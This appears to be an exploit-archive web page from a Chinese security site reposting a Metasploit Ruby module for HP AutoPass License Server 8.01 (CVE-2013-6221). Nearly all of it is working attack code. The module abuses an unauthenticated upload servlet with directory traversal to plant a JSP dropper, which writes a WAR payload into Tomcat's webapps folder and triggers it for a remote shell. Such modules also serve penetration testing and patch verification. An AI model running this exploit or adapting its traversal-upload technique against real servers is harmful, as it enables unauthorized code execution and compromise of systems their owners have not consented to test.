首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP AutoPass License Server File Upload
来源:metasploit.com 作者:rgod 发布时间:2014-06-27  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP AutoPass License Server File Upload',
      'Description' => %q{
        This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
        weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
        authentication in the CommunicationServlet component. On the other hand, it's possible to
        abuse a directory traversal when uploading files thorough the same component, allowing to
        upload an arbitrary payload embedded in a JSP. The module has been tested successfully on
        HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
      },
      'Author'       =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2013-6221'],
          ['ZDI', '14-195'],
          ['BID', '67989'],
          ['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125']
        ],
      'Privileged'  => true,
      'Platform'    => %w{ java },
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          ['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2014'))

    register_options(
      [
        Opt::RPORT(5814),
        OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
        OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
        OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
      ], self.class)
  end


  def check
    check_code = Exploit::CheckCode::Safe

    res = send_request_cgi(
      {
        'uri'    => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
        'method' => 'POST'
      })

    unless res
      check_code = Exploit::CheckCode::Unknown
    end

    if res && res.code == 500 &&
       res.body.to_s.include?("HP AutoPass License Server") &&
       res.body.to_s.include?("java.lang.NullPointerException") &&
       res.body.to_s.include?("com.hp.autopass")

      check_code = Exploit::CheckCode::Detected
    end

    check_code
  end

  def exploit
    app_base = rand_text_alphanumeric(4+rand(32-4))
    war = payload.encoded_war({ :app_name => app_base }).to_s
    war_filename = "#{app_base}.war"

    # By default, the working directory when executing the JSP is:
    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin
    # The war should be dropped to the next location to autodeploy:
    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps
    war_traversal = webapps_traversal
    war_traversal << "webapps/#{war_filename}"
    dropper = jsp_drop_bin(war, war_traversal)
    dropper_filename = rand_text_alpha(8) + ".jsp"

    print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...")
    # The JSP, by default, is uploaded to:
    # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\
    # In order to execute it, through the AutoPass application we would like to drop it here:
    # C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
    dropper_traversal = install_traversal
    dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
    res = upload_file(dropper_traversal, dropper)

    register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
    register_files_for_cleanup("#{webapps_traversal}webapps/#{war_filename}")

    unless res && res.code == 500 &&
           res.body.to_s.include?("HP AutoPass License Server") &&
           res.body.to_s.include?("java.lang.NullPointerException") &&
           res.body.to_s.include?("com.hp.autopass")

      print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...")
    end

    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "scripts", dropper_filename),
      'method' => 'GET'
    })

    unless res and res.code == 200
      print_error("#{peer} - Unexpected response after executing the dropper...")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi(
        {
          'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"),
          'method' => 'GET'
        })
      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end

  def webapps_traversal
    "../" * datastore['WEBAPPS_DEPTH']
  end

  def install_traversal
    "/.." * datastore['INSTALL_DEPTH']
  end

  # Using a JSP dropper because the vulnerability doesn't allow to upload
  # 'binary' files, so a WAR can't be uploaded directly.
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def upload_file(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadedFile\"; filename=\"#{file_name}\"")

    data = post_data.to_s

    res = send_request_cgi(
      {
        'uri'    => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
        'method' => 'POST',
        'data'   => data,
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
      })

    res
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS14-009 .NET Deployment Servi
·chkrootkit 0.49 - Local Root V
·MS13-097 Registry Symlink IE S
·check_dhcp 2.0.2 (Nagios Plugi
·Python CGIHTTPServer File Disc
·Gitlist <= 0.4.0 - Remote Code
·Internet Explorer 8, 9 & 10 -
·Supermicro Onboard IPMI Port 4
·AlienVault OSSIM < 4.7.0 - av-
·OpenSSL DTLS Fragment Buffer O
·Cogent DataHub Command Injecti
·MongoDB NoSQL Collection Enume
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved